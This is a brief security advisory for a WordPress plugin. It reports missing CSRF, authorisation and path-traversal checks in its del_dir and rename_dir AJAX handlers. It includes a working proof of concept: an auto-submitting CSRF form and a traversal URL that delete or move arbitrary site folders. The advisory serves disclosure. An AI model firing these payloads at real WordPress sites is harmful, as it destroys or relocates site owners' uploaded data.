The lack of CSRF, Authorisation and Path Traversal checks in wp_ajax_del_dir() and wp_ajax_rename_dir() AJAX methods in functions.php make it possible for an authenticated user with a role as low as subscriber to delete and rename arbitrary folders. CSRF attacks against such authenticated users is also possible, in order to make them perform those malicious actions.
<html>
<body onload="document.forms[0].submit()">
<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="del_dir" />
<input type="hidden" name="dir" value="" />
</form>
</body>
</html>
The dir parameter can be changed, for example using '../' will delete the content of wp-content/uploads.
To rename and move wp-content/uploads/articulate_uploads to wp-content/yolo:
https://<BLOG>/wp-admin/admin-ajax.php?action=rename_dir&dir_name=/&title=../../yolo/